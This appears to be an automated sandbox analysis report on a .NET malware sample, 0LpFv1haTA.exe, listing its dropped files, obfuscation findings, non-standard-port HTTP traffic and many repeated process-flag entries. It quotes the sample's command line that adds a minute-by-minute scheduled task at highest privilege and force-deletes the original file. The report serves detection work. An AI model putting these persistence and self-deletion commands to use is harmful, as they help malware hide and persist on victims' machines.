Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449ED9000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: System.Windows.Forms.ni.pdb source: WER895A.tmp.dmp.36.dr
Source: Binary string: System.Drawing.ni.pdb source: WER895A.tmp.dmp.36.dr
Source: Binary string: System.Configuration.ni.pdb source: WER895A.tmp.dmp.36.dr
Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WER895A.tmp.dmp.36.dr
Source: Binary string: System.Configuration.pdb source: WER895A.tmp.dmp.36.dr
Source: Binary string: System.Drawing.ni.pdbRSDS source: WER895A.tmp.dmp.36.dr
Source: Binary string: rlib.pdb source: 0LpFv1haTA.exe, 0000000D.00000002.2450732907.000001E4629D4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Xml.pdb source: WER895A.tmp.dmp.36.dr
Source: Binary string: System.pdb source: 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449ED9000.00000004.00000800.00020000.00000000.sdmp, WER895A.tmp.dmp.36.dr
Source: Binary string: System.Xml.ni.pdbRSDS# source: WER895A.tmp.dmp.36.dr
Source: Binary string: System.Core.ni.pdb source: WER895A.tmp.dmp.36.dr
Source: Binary string: System.Windows.Forms.pdb source: WER895A.tmp.dmp.36.dr
Source: Binary string: mscorlib.pdb source: 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449ED9000.00000004.00000800.00020000.00000000.sdmp, WER895A.tmp.dmp.36.dr
Source: Binary string: \??\C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.PDB,D source: 0LpFv1haTA.exe, 0000000D.00000002.2450732907.000001E4629D4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.ni.pdbRSDSJ< source: WER895A.tmp.dmp.36.dr
Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: WER895A.tmp.dmp.36.dr
Source: Binary string: System.Drawing.pdb source: WER895A.tmp.dmp.36.dr
Source: Binary string: System.Management.pdb source: WER895A.tmp.dmp.36.dr
Source: Binary string: mscorlib.ni.pdb source: WER895A.tmp.dmp.36.dr
Source: Binary string: System.Management.ni.pdb source: WER895A.tmp.dmp.36.dr
Source: Binary string: rlib.pdba source: 0LpFv1haTA.exe, 0000000D.00000002.2450732907.000001E4629D4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdb source: WER895A.tmp.dmp.36.dr
Source: Binary string: System.Core.pdb` source: WER895A.tmp.dmp.36.dr
Source: Binary string: mscorlib.pdb ` source: WER895A.tmp.dmp.36.dr
Source: Binary string: System.Drawing.pdb` source: WER895A.tmp.dmp.36.dr
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdbh source: 0LpFv1haTA.exe, 0000000D.00000002.2450732907.000001E4629A0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER895A.tmp.dmp.36.dr
Source: Binary string: System.Configuration.pdbP source: WER895A.tmp.dmp.36.dr
Source: Binary string: System.ni.pdb source: WER895A.tmp.dmp.36.dr
Source: Binary string: System.Core.ni.pdbRSDS source: WER895A.tmp.dmp.36.dr

Data Obfuscation
barindex
.NET source code contains potential unpacker
Source: manager.exe.7.dr, DllHandler.cs .Net Code: DllNodeHandler System.Reflection.Assembly.Load(byte[])
Source: manager.exe.7.dr, DllHandler.cs .Net Code: DllNodeHandler
Source: manager.exe.41.dr, DllHandler.cs .Net Code: DllNodeHandler System.Reflection.Assembly.Load(byte[])
Source: manager.exe.41.dr, DllHandler.cs .Net Code: DllNodeHandler
Binary contains a suspicious time stamp
Source: 0LpFv1haTA.exe Static PE information: 0xC879E997 [Fri Jul 31 14:54:15 2076 UTC]
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\0LpFv1haTA.exe Code function: 0_2_00007FF848F000BD pushad ; iretd 0_2_00007FF848F000C1
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Code function: 7_2_00007FF848F100BD pushad ; iretd 7_2_00007FF848F100C1
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Code function: 13_2_00007FF848F100BD pushad ; iretd 13_2_00007FF848F100C1
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Code function: 40_2_00007FF848F200BD pushad ; iretd 40_2_00007FF848F200C1
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Code function: 46_2_00007FF848F300BD pushad ; iretd 46_2_00007FF848F300C1
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Code function: 47_2_00007FF848F100BD pushad ; iretd 47_2_00007FF848F100C1
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Code function: 48_2_00007FF848F100BD pushad ; iretd 48_2_00007FF848F100C1
Drops PE files
Source: C:\Users\user\AppData\Roaming\manager.exe File created: C:\Users\user\AppData\Roaming\XenoManager\manager.exe Jump to dropped file
Source: C:\Users\user\Desktop\0LpFv1haTA.exe File created: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe File created: C:\Users\user\AppData\Roaming\manager.exe Jump to dropped file

Boot Survival
barindex
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe schtasks /create /tn "0LpFv1haTA" /sc MINUTE /tr "C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe" /rl HIGHEST /f

Hooking and other Techniques for Hiding and Protection
barindex
Self deletion via cmd or bat file
Source: C:\Users\user\Desktop\0LpFv1haTA.exe Process created: "C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && schtasks /create /tn "0LpFv1haTA" /sc MINUTE /tr "C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\user\Desktop\0LpFv1haTA.exe" &&START "" "C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe"
Source: C:\Users\user\Desktop\0LpFv1haTA.exe Process created: "C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && schtasks /create /tn "0LpFv1haTA" /sc MINUTE /tr "C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\user\Desktop\0LpFv1haTA.exe" &&START "" "C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe" Jump to behavior
Uses known network protocols on non-standard ports
Source: unknown Network traffic detected: HTTP traffic on port 49739 -> 8817
Source: unknown Network traffic detected: HTTP traffic on port 8817 -> 49739
Source: unknown Network traffic detected: HTTP traffic on port 8817 -> 49739
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Users\user\Desktop\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\netsh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
